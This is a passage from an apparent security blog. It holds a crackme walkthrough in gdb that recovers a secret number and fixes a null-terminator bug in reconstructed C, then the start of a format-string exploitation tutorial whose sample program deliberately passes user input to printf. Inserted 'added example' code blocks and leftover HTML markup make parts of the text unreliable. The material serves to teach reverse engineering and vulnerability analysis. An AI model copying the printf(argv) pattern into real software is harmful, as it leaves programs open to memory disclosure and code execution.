PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048724 lt;+216gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048729 lt;+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;+233gt;: call 0x8048500 lt;[email protected];/span/span span 
class="code-line"span class="go" 0x0804873a lt;+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x0804874b lt;+255gt;: add DWORD PTR [esp+0x1c],0x3/span/span span class="code-line"span class="go" 0x08048750 lt;+260gt;: add DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x08048755 lt;+265gt;: add DWORD PTR [esp+0x24],0x3/span/span span class="code-line"span class="go" 0x0804875a lt;+270gt;: cmp DWORD PTR [esp+0x1c],0x14/span/span span class="code-line"span class="go" 0x0804875f lt;+275gt;: jle 0x80486ea lt;main+158gt;/span/span span class="code-line"span class="go" 0x08048761 lt;+277gt;: mov DWORD PTR [esp+0x4],0x8048886/span/span span class="code-line"span class="go" 0x08048769 lt;+285gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804876d lt;+289gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048770 lt;+292gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go"---Type lt;returngt; to continue, or q lt;returngt; to quit---/span/span span class="code-line"span class="go" 0x08048775 lt;+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go" 0x08048788 
lt;+316gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804878d lt;+321gt;: call 0x8048638 lt;yesgt;/span/span span class="code-line"span class="go" 0x08048792 lt;+326gt;: jmp 0x8048799 lt;main+333gt;/span/span span class="code-line"span class="go" 0x08048794 lt;+328gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x08048799 lt;+333gt;: mov eax,0x0/span/span span class="code-line"span class="go" 0x0804879e lt;+338gt;: mov ebx,DWORD PTR [esp+0x4c]/span/span span class="code-line"span class="go" 0x080487a2 lt;+342gt;: xor ebx,DWORD PTR gs:0x14/span/span span class="code-line"span class="go" 0x080487a9 lt;+349gt;: je 0x80487b0 lt;main+356gt;/span/span span class="code-line"span class="go" 0x080487ab lt;+351gt;: call 0x8048490 lt;[email protected];/span/span span class="code-line"span class="go" 0x080487b0 lt;+356gt;: mov ebx,DWORD PTR [ebp-0x4]/span/span span class="code-line"span class="go" 0x080487b3 lt;+359gt;: leave /span/span span class="code-line"span class="go" 0x080487b4 lt;+360gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pFirstly on line 3 I set the disassembly flavor to codeintel/code, this is because I'm more confortable with assembly in intel syntax, it defaults to ATamp;T./p pLooking at the output of codeinfo functions/code its obvious that this application was written in C due to the calls to functions in the C standard library like codestrcmp/code on line 9 and codeprintf/code on line 11. So we can assume that the codemain/code function on line 39 is the start of the application from the programmers point of view so we disassemble that function on line 43./p pFrom the disassembly it looks like +29 (line 54) is where its printing 'Please enter the secret number:' and +49 (line 58) is where its getting my input. 
There are some cmp's going on at +58 (line 60), +70 (line 63) and +79 (line 66), lets run it in gdb, set a a href="https://en.wikipedia.org/wiki/Breakpoint"breakpoint/a just after the call to scanf (at +49 or line 58) and step through it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048682/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048682/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 12345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048682 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048682 to 0x804868c:/span/span span class="code-line"span class="go"=gt; 
0x08048682 lt;main+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;main+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;main+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"p $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="m"1/span/span span class="code-line"/code/pre/div /td/tr/table pSo the EAX a href="https://en.wikipedia.org/wiki/Processor_register"register/a contains the value 1, this value is put into the the memory address pointed to by ESP+0x28 on line 10, which is most likely a pointer variable to a codeint/code or codeunsigned int/code on the stack. This value is then compared to 0x1 (or 1 in decimal) on line 11 and finally if the comparisons are not equal execution jumps to 0x804869f./p p0x804869f is on line 68 (+83) of the disassembly above and all it does is call the codenope/code function. 
Let's disassemble the `nope` function and see what it does:

```
 1  (gdb) disassemble nope
 2  Dump of assembler code for function nope:
 3     0x0804860d <+0>:   push   ebp
 4     0x0804860e <+1>:   mov    ebp,esp
 5     0x08048610 <+3>:   sub    esp,0x18
 6     0x08048613 <+6>:   mov    eax,ds:0x804a040
 7     0x08048618 <+11>:  mov    DWORD PTR [esp],eax
 8     0x0804861b <+14>:  call   0x8048480 <fflush@plt>
 9     0x08048620 <+19>:  mov    DWORD PTR [esp],0x8048850
10     0x08048627 <+26>:  call   0x80484a0 <puts@plt>
11     0x0804862c <+31>:  mov    DWORD PTR [esp],0x1
12     0x08048633 <+38>:  call   0x80484c0 <exit@plt>
13  (gdb) x/s 0x8048850
14  0x8048850:      "Nope."
```

Clearly this would be bad: it prints the string `Nope.` via the `puts` call on line 10 and exits the application with exit code 1 on line 12. Looking at [man scanf](http://linux.die.net/man/3/scanf), it says:

> These functions return the number of input items successfully matched and assigned, which can be fewer than provided for, or even zero in the event of an early matching failure.
>
> The value EOF is returned if the end of input is reached before either the first successful conversion or a matching failure occurs. EOF is also returned if a read error occurs

Let's look at the other comparisons:

```
(gdb) delete 1
(gdb) break *0x0804868d
Breakpoint 2 at 0x804868d
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/crackmes/crackme1_32bit
Please enter the secret number: 12345678

Breakpoint 2, 0x0804868d in main ()
(gdb) disass $eip,+10
Dump of assembler code from 0x804868d to 0x8048697:
=> 0x0804868d <main+65>:  movzx  eax,BYTE PTR [esp+0x36]
   0x08048692 <main+70>:  cmp    al,0x39
   0x08048694 <main+72>:  jne    0x804869f <main+83>
   0x08048696 <main+74>:  movzx  eax,BYTE PTR [esp+0x35]
End of assembler dump.
(gdb) x/xb $esp+0x36
0xbffffc66:     0x32
```

This is comparing 0x32 ('2' in ASCII) with 0x39 ('9' in ASCII), so this is going to fail and jump to the `nope` call. As I only put one '2' in my number I guess we can assume that this is the 2nd value in the number; let's replace that and see what happens:

```
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/crackmes/crackme1_32bit
Please enter the secret number: 19345678

Breakpoint 2, 0x0804868d in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x804868d to 0x80486a1:
=> 0x0804868d <main+65>:  movzx  eax,BYTE PTR [esp+0x36]
   0x08048692 <main+70>:  cmp    al,0x39
   0x08048694 <main+72>:  jne    0x804869f <main+83>
   0x08048696 <main+74>:  movzx  eax,BYTE PTR [esp+0x35]
   0x0804869b <main+79>:  cmp    al,0x36
   0x0804869d <main+81>:  je     0x80486a6 <main+90>
   0x0804869f <main+83>:  call   0x804860d <nope>
End of assembler dump.
(gdb) x/xb $esp+0x36
0xbffffc66:     0x39
(gdb) x/xb $esp+0x35
0xbffffc65:     0x31
```

So we have our 2nd number, but looking at the next comparison we need 6 as our first number; let's start again:

```
(gdb) delete 2
(gdb) break *0x0804869d
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/crackme/crackmes/crackme1_32bit
Please enter the secret number: 69345678

Breakpoint 3, 0x0804869d in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x804869d to 0x80486b1:
=> 0x0804869d <main+81>:  je     0x80486a6 <main+90>
   0x0804869f <main+83>:  call   0x804860d <nope>
   0x080486a4 <main+88>:  jmp    0x80486b3 <main+103>
   0x080486a6 <main+90>:  mov    eax,ds:0x804a040
   0x080486ab <main+95>:  mov    DWORD PTR [esp],eax
   0x080486ae <main+98>:  call   0x8048480 <fflush@plt>
End of assembler dump.
(gdb) stepi
0x080486a6 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x80486a6 to 0x80486ba:
=> 0x080486a6 <main+90>:  mov    eax,ds:0x804a040
   0x080486ab <main+95>:  mov    DWORD PTR [esp],eax
   0x080486ae <main+98>:  call   0x8048480 <fflush@plt>
   0x080486b3 <main+103>: mov    DWORD PTR [esp+0x2d],0x0
End of assembler dump.
```

That worked. Now we have the knowledge to create the first part of the application:

```c
#include <stdio.h>
#include <stdlib.h>

/* Called whenever a check fails: prints "Nope." and exits with status 1. */
void nope()
{
    puts("Nope.");
    exit(1);
}

int main()
{
    int r;
    char input[50];
    printf("Please enter the secret number: ");
    /* %49s leaves room for the terminating NUL in the 50-byte buffer */
    r = scanf("%49s", input);
    /* scanf returns the number of items assigned; anything but 1 fails */
    if (1 != r)
        nope();
    /* the two byte comparisons seen at main+65 and main+74 */
    if ('9' != input[1])
        nope();
    if ('6' != input[0])
        nope();
    /* fflush on an input stream is undefined by the C standard;
     * glibc defines it as discarding buffered input, which is what the
     * binary relies on */
    fflush(stdin);
    /* REST OF APPLICATION */
    return 0;
}
```

The actual source code might not be exactly the same, but this application fragment will give the same result.

Now let's look at the rest of the code, specifically the calls to `strlen`, `atoi` and `strcmp`:

```
(gdb) delete 3
(gdb) break *0x08048724
Breakpoint 4 at 0x8048724
(gdb) break *0x08048735
Breakpoint 5 at 0x8048735
(gdb) break *0x08048770
Breakpoint 6 at 0x8048770
(gdb) c
Continuing.

Breakpoint 4, 0x08048724 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048724 to 0x8048738:
=> 0x08048724 <main+216>: call   0x80484d0 <strlen@plt>
   0x08048729 <main+221>: cmp    eax,0x7
   0x0804872c <main+224>: ja     0x8048746 <main+250>
   0x0804872e <main+226>: lea    eax,[esp+0x15]
   0x08048732 <main+230>: mov    DWORD PTR [esp],eax
   0x08048735 <main+233>: call   0x8048500 <atoi@plt>
End of assembler dump.
```

So we are at the `strlen`; looking at the next instruction, its result is compared with 0x7. Let's step inside it and look at the arguments:

```
(gdb) stepi
0x080484d0 in strlen@plt ()
(gdb) x/3xw $esp
0xbffffc2c:     0x08048729      0xbffffc5d      0xbffffc65
(gdb) x/s 0xbffffc5d
0xbffffc5d:     "E"
```

Hmmm... ok, we have an 'E' as the argument, let's continue...

```
(gdb) c
Continuing.

Breakpoint 5, 0x08048735 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048735 to 0x8048749:
=> 0x08048735 <main+233>: call   0x8048500 <atoi@plt>
   0x0804873a <main+238>: lea    ecx,[esp+0x2d]
   0x0804873e <main+242>: mov    edx,DWORD PTR [esp+0x18]
   0x08048742 <main+246>: add    edx,ecx
   0x08048744 <main+248>: mov    BYTE PTR [edx],al
   0x08048746 <main+250>: add    DWORD PTR [esp+0x18],0x1
End of assembler dump.
```

We are now at the `atoi` call; again let's step inside and have a peek at the arguments:

```
(gdb) stepi
0x08048500 in atoi@plt ()
(gdb) x/3xw $esp
0xbffffc2c:     0x0804873a      0xbffffc45      0xbffffc65
(gdb) x/s 0xbffffc45
0xbffffc45:     "345\001"
```

Ok, so that looks like the next 3 numbers I put in as my secret number (69345678), let's continue:

```
(gdb) c
Continuing.

Breakpoint 4, 0x08048724 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048724 to 0x8048738:
=> 0x08048724 <main+216>: call   0x80484d0 <strlen@plt>
   0x08048729 <main+221>: cmp    eax,0x7
   0x0804872c <main+224>: ja     0x8048746 <main+250>
   0x0804872e <main+226>: lea    eax,[esp+0x15]
   0x08048732 <main+230>: mov    DWORD PTR [esp],eax
   0x08048735 <main+233>: call   0x8048500 <atoi@plt>
End of assembler dump.
(gdb) stepi
0x080484d0 in strlen@plt ()
(gdb) x/3xw $esp
0xbffffc2c:     0x08048729      0xbffffc5d      0xbffffc65
(gdb) x/s 0xbffffc5d
0xbffffc5d:     "EY"
```

O..K.., that's unusual, continuing:

```
(gdb) c
Continuing.

Breakpoint 5, 0x08048735 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048735 to 0x8048749:
=> 0x08048735 <main+233>: call   0x8048500 <atoi@plt>
   0x0804873a <main+238>: lea    ecx,[esp+0x2d]
   0x0804873e <main+242>: mov    edx,DWORD PTR [esp+0x18]
   0x08048742 <main+246>: add    edx,ecx
   0x08048744 <main+248>: mov    BYTE PTR [edx],al
   0x08048746 <main+250>: add    DWORD PTR [esp+0x18],0x1
End of assembler dump.
(gdb) stepi
0x08048500 in atoi@plt ()
(gdb) x/3xw $esp
0xbffffc2c:     0x0804873a      0xbffffc45      0xbffffc65
(gdb) x/s 0xbffffc45
0xbffffc45:     "678\002"
```

Hopefully you can see what I'm doing by now: it looks like there is a loop which goes through my input number 3 digits at a time, starting from the 3rd character, and converts each group into an ASCII character. Let's remove the breakpoints at the calls to `atoi` and `strlen` and see what that `strcmp` is doing:

```
(gdb) delete 4
(gdb) delete 5
(gdb) c
Continuing.

Breakpoint 6, 0x08048770 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048770 to 0x8048784:
=> 0x08048770 <main+292>: call   0x8048460 <strcmp@plt>
   0x08048775 <main+297>: test   eax,eax
   0x08048777 <main+299>: jne    0x8048794 <main+328>
   0x08048779 <main+301>: lea    eax,[esp+0x2d]
   0x0804877d <main+305>: mov    DWORD PTR [esp+0x4],eax
   0x08048781 <main+309>: mov    DWORD PTR [esp],0x8048890
End of assembler dump.
(gdb) stepi
0x08048460 in strcmp@plt ()
(gdb) x/3xw $esp
0xbffffc2c:     0x08048775      0xbffffc5d      0x08048886
(gdb) x/s 0xbffffc5d
0xbffffc5d:     "EY\246"
(gdb) x/s 0x08048886
0x8048886:      "Evilzone"
```

Ahha! So it looks like it's comparing the converted string with the string found earlier with the `strings` command (`Evilzone`). 'E' is 069 on the ASCII table (see [man ascii](http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7) for more information), which explains why the first 2 numbers had to be 69.
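The conversion the loop performs, written out in C as an added example. This is not the crackme's source (which is not on the page) and not the author's code: the layout is my reconstruction of what the gdb session shows, namely that the first two digits give one ASCII code and every later group of three digits is passed through `atoi` with only the low byte of the result stored (the `mov BYTE PTR [edx],al` above), so 345 becomes 'Y' (0x59) and 678 becomes 0xa6, which is the `"EY\246"` seen at the `strcmp` call. The function names, the 64-byte scratch buffers and the bounds check on the output buffer are mine.

```c
/* Added example: ASCII-decimal encoding of the crackme secret, as
 * reconstructed from the gdb session. Not the crackme's own source. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Decode a digit string into out (NUL-terminated). Returns the number of
 * characters produced, or -1 if the input is malformed or would not fit
 * in outsz bytes. The binary stores each byte at [esp+0x2d]+counter with
 * no comparable bound on the destination. */
int decode_secret(const char *digits, char *out, size_t outsz)
{
    size_t len = strlen(digits);
    size_t pos, n = 0;
    char chunk[4];

    if (len < 2 || outsz == 0)
        return -1;
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)digits[i]))
            return -1;          /* atoi would stop silently; we refuse */

    /* Assumption: the first character comes from two digits ("69" -> 'E'). */
    memcpy(chunk, digits, 2);
    chunk[2] = '\0';
    if (n + 1 >= outsz)
        return -1;
    out[n++] = (char)(atoi(chunk) & 0xff);

    /* Every further character comes from a group of three digits. */
    for (pos = 2; pos < len; pos += 3) {
        if (len - pos < 3)      /* trailing partial group: malformed */
            return -1;
        memcpy(chunk, digits + pos, 3);
        chunk[3] = '\0';
        if (n + 1 >= outsz)     /* no room for this byte plus the NUL */
            return -1;
        /* low byte only, as "mov BYTE PTR [edx],al" keeps: 345 -> 'Y' */
        out[n++] = (char)(atoi(chunk) & 0xff);
    }
    out[n] = '\0';
    return (int)n;
}

/* Encode a word the same way: the first code as written (two digits for
 * 'E'; codes of 100 or more would not round-trip through decode_secret),
 * each later code zero-padded to three digits. Returns the length of the
 * digit string or -1 if it would not fit. */
int encode_secret(const char *word, char *out, size_t outsz)
{
    size_t n = 0;
    if (word[0] == '\0' || outsz == 0)
        return -1;
    for (size_t i = 0; word[i] != '\0'; i++) {
        int w = snprintf(out + n, outsz - n, i == 0 ? "%d" : "%03d",
                         (unsigned char)word[i]);
        if (w < 0 || (size_t)w >= outsz - n)
            return -1;          /* output truncated: would not fit */
        n += (size_t)w;
    }
    return (int)n;
}

/* Does this digit string decode to word? (what the strcmp above decides) */
int secret_matches(const char *digits, const char *word)
{
    char buf[64];
    if (decode_secret(digits, buf, sizeof buf) < 0)
        return 0;
    return strcmp(buf, word) == 0;
}

/* Does word encode to digits? */
int encoded_equals(const char *word, const char *digits)
{
    char buf[128];
    if (encode_secret(word, buf, sizeof buf) < 0)
        return 0;
    return strcmp(buf, digits) == 0;
}

/* Decode into a scratch buffer limited to outsz bytes; returns the count
 * or -1, so the bound check can be exercised without a caller buffer. */
int decode_length(const char *digits, size_t outsz)
{
    char buf[64];
    if (outsz > sizeof buf)
        outsz = sizeof buf;
    return decode_secret(digits, buf, outsz);
}

int main(void)
{
    char buf[64];
    int n = decode_secret("69345678", buf, sizeof buf);
    printf("69345678 -> %d chars, first two: %c%c\n", n, buf[0], buf[1]);
    if (encode_secret("Evilzone", buf, sizeof buf) > 0)
        printf("Evilzone -> %s\n", buf);
    return 0;
}
```

`decode_length` with a 9-byte limit succeeds for the eight-character word and fails with an 8-byte limit; that refusal is the check the binary lacks, since its only length test is the `cmp eax,0x7` on the output string's `strlen`, not on the buffer it writes into.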
Using the ASCII table to work out the rest of the number is easy; it turns out to be `69118105108122111110101`.

It doesn't work on the 32 bit version, as explained earlier, so to test that it is the right number use the 64 bit version:

```
~/crackmes# ./crackme1_64bit
Please enter the secret number: 69118105108122111110101
The Password translates into Evilzone, Good job.
```

## Investigating The Bug

Great! Challenge cracked. Now let's run this through `gdb` so you can see why the 32 bit version of this challenge is broken:

```
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/crackme/crackmes/crackme1_32bit
Please enter the secret number: 69118105108122111110101

Breakpoint 6, 0x08048770 in main ()
(gdb) disass $eip,+20
Dump of assembler code from 0x8048770 to 0x8048784:
=> 0x08048770 <main+292>:   call   0x8048460 <strcmp@plt>
   0x08048775 <main+297>:   test   eax,eax
   0x08048777 <main+299>:   jne    0x8048794 <main+328>
   0x08048779 <main+301>:   lea    eax,[esp+0x2d]
   0x0804877d <main+305>:   mov    DWORD PTR [esp+0x4],eax
   0x08048781 <main+309>:   mov    DWORD PTR [esp],0x8048890
End of assembler dump.
(gdb) stepi
0x08048460 in strcmp@plt ()
(gdb) x/3xw $esp
0xbffffc2c:   0x08048775   0xbffffc5d   0x08048886
(gdb) x/s 0xbffffc5d
0xbffffc5d:   "Evilzone69118105108122111110101"
(gdb) x/s 0x08048886
0x8048886:   "Evilzone"
```

OK, so this will still fail, but why? Look at where our original number is stored:

```
(gdb) x/s $esp+0x35
0xbffffc65:   "69118105108122111110101"
(gdb) x/s 0xbffffc5d
0xbffffc5d:   "Evilzone69118105108122111110101"
```

0xbffffc65 is where our original number is stored in memory and 0xbffffc5d is where the string converted from that number is stored. 0xbffffc65 - 0xbffffc5d = 8, so the two buffers are 8 bytes apart, and the string 'Evilzone' is exactly 8 bytes. Once our string has been calculated it fills the whole buffer, there is no room for a null terminator, and `strcmp` reads straight on into the input buffer.

## Rewriting The App

Using the knowledge we have gained about this application, we should now be able to build it ourselves. The following is my implementation of the application written in C; please remember that the real source code may vary:

```c
 1  #include <stdio.h>
 2  #include <stdlib.h>
 3  #include <string.h>
 4  
 5  #define ANSWER "Evilzone"
 6  
 7  void nope()
 8  {
 9      puts("Nope.");
10      exit(1);
11  }
12  
13  void good()
14  {
15      puts("Good job.");
16  }
17  
18  int main()
19  {
20      int r, i, c;
21      char converted[8], input[24], check[4];
22      printf("Please enter the secret number: ");
23      r = scanf("%23s", input);
24      if (1 != r)
25          nope();
26      if ('9' != input[1])
27          nope();
28      if ('6' != input[0])
29          nope();
30      fflush(stdin);
31      converted[0] = 'E';
32      check[3] = '\0';
33      for (i = 2, c = 1; strlen(converted) < 8 && i < strlen(input); i += 3, c++) {
34          check[0] = input[i];
35          check[1] = input[i+1];
36          check[2] = input[i+2];
37          converted[c] = atoi(check);
38      }
39      if (strcmp(converted, ANSWER) == 0) {
40          printf("The Password translates into %s, ", converted);
41          good();
42      }
43      else
44          nope();
45      return 0;
46  }
```

This application has the same issue as the original: it doesn't work on 32 bit systems.

### Fixing The App

In my application there were two main reasons it wasn't working on my 32 bit machine. The first was that I wasn't zeroing out the character array that I use to store the converted string (`converted`); because of this the value returned by `strlen` in the for loop on line 33 was never less than 8 and so the
`for` loop would never be executed. Secondly, the string again was not being null terminated. Here is the fixed application:

```c
 1  #include <stdio.h>
 2  #include <stdlib.h>
 3  #include <string.h>
 4  
 5  #define ANSWER "Evilzone"
 6  
 7  void nope()
 8  {
 9      puts("Nope.");
10      exit(1);
11  }
12  
13  void good()
14  {
15      puts("Good job.");
16  }
17  
18  int main()
19  {
20      int r, i, c;
21      char converted[9], input[24], check[4];
22      printf("Please enter the secret number: ");
23      r = scanf("%23s", input);
24      if (1 != r)
25          nope();
26      if ('9' != input[1])
27          nope();
28      if ('6' != input[0])
29          nope();
30      fflush(stdin);
31      memset(converted, 0, sizeof converted);
32      converted[0] = 'E';
33      check[3] = '\0';
34      for (i = 2, c = 1; strlen(converted) < 8 && i < strlen(input); i += 3, c++) {
35          check[0] = input[i];
36          check[1] = input[i+1];
37          check[2] = input[i+2];
38          converted[c] = atoi(check);
39      }
40      converted[c] = '\0';
41      if (strcmp(converted, ANSWER) == 0) {
42          printf("The Password translates into %s, ", converted);
43          good();
44      }
45      else
46          nope();
47      return 0;
48  }
```

This works on both 64 bit and 32 bit systems. There are only three changes here: the size of the character array `converted` on line 21 has increased to 9, so it now has the space to store the null terminator; the call to `memset` fills the array with null characters; and lastly there is an explicit null terminator on line 40, which should already be null from the call to `memset` but is set just in case.

That concludes this crackme solution. I hope you enjoyed it.

Happy Hacking :-)
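As an added example that is not part of the original post, here is the crackme's number-to-word conversion written as two bounded functions: `encode_secret` produces the number worked out above from a word, and `decode_secret` is the decoder with the fix applied properly, so that, unlike `converted[8]` in the original, it always keeps room for the terminator and truncates rather than running into the neighbouring buffer. The function names and return-value conventions are my own.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Encode a word the way the crackme expects: "69" for the leading 'E' (its
 * two-digit ASCII code) followed by the three-digit decimal ASCII code of
 * every remaining character, e.g. "Evilzone" -> "69118105108122111110101".
 * Returns the number of digits written, or -1 if the word does not start
 * with 'E', contains a character whose code is not three digits wide, or
 * out is too small (the encoding needs 2 + 3 * (len - 1) digits plus NUL). */
int encode_secret(const char *word, char *out, size_t outlen)
{
    size_t i, pos = 0, wlen = strlen(word);

    if (wlen == 0 || word[0] != 'E' || outlen < 2 + 3 * (wlen - 1) + 1)
        return -1;
    out[pos++] = '6';
    out[pos++] = '9';
    for (i = 1; i < wlen; i++) {
        unsigned char ch = (unsigned char)word[i];
        /* codes below 100 would only be two digits and break the triplet layout */
        if (ch < 100)
            return -1;
        snprintf(out + pos, outlen - pos, "%03d", (int)ch);
        pos += 3;
    }
    out[pos] = '\0';
    return (int)pos;
}

/* Decode a number back into the word. Where the original stored the result in
 * converted[8] with no room for a terminator, this never writes past outlen and
 * always NUL-terminates out, truncating the word if it does not fit.
 * Returns the number of characters stored, or -1 if the number is malformed
 * (no "69" prefix, a non-digit, or a trailing partial triplet). */
int decode_secret(const char *number, char *out, size_t outlen)
{
    size_t i, c = 0, nlen = strlen(number);
    char triplet[4] = {0};   /* the three digits being converted, plus NUL */

    if (outlen == 0)
        return -1;
    out[0] = '\0';
    if (nlen < 2 || number[0] != '6' || number[1] != '9' || (nlen - 2) % 3 != 0)
        return -1;
    /* validate every triplet before converting so malformed input is rejected
     * even when the output buffer would have truncated it away */
    for (i = 2; i < nlen; i += 3) {
        if (!isdigit((unsigned char)number[i]) ||
            !isdigit((unsigned char)number[i + 1]) ||
            !isdigit((unsigned char)number[i + 2]))
            return -1;
    }
    if (c + 1 < outlen)
        out[c++] = 'E';
    /* c + 1 < outlen keeps the last byte free for the terminator */
    for (i = 2; i < nlen && c + 1 < outlen; i += 3, c++) {
        memcpy(triplet, number + i, 3);
        out[c] = (char)atoi(triplet);
    }
    out[c] = '\0';
    return (int)c;
}

int main(void)
{
    char number[32], word[16], tight[8];   /* tight mirrors the original converted[8] */

    encode_secret("Evilzone", number, sizeof number);
    printf("Evilzone encodes to %s\n", number);
    decode_secret(number, word, sizeof word);
    printf("decoded into a 16-byte buffer: %s\n", word);
    decode_secret(number, tight, sizeof tight);
    printf("decoded into an 8-byte buffer: %s (truncated, still terminated)\n", tight);
    return 0;
}
```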

Plain Format String Vulnerability

20 May 2014 at 19:31
By: 0xe7
This is the second of a series of tutorials exploring how to detect and exploit stack based vulnerabilities on x86-32 Linux systems. The first can be found [here](/x86-32-linux/2014/05/08/plain-buffer-overflow/).

This tutorial will involve detecting and exploiting a [format string](https://en.wikipedia.org/wiki/Printf_format_string) [vulnerability](https://en.wikipedia.org/wiki/Uncontrolled_format_string). Format string vulnerabilities are sometimes easier to find than [buffer overflows](https://en.wikipedia.org/wiki/Buffer_overflow) but nearly always harder to exploit, which is why I decided to do this tutorial after the buffer overflow.

A format string vulnerability happens when a programmer has passed user controlled input as part of the first argument of a call to one of the [printf family](http://linux.die.net/man/3/printf) of functions.

All of the code in this tutorial was written by the author.

## The Vulnerable App

Below is the source code of the vulnerable application that we will be attacking.
It is written in C and it is the same application that is attacked in the first part of this series.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
```
class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan 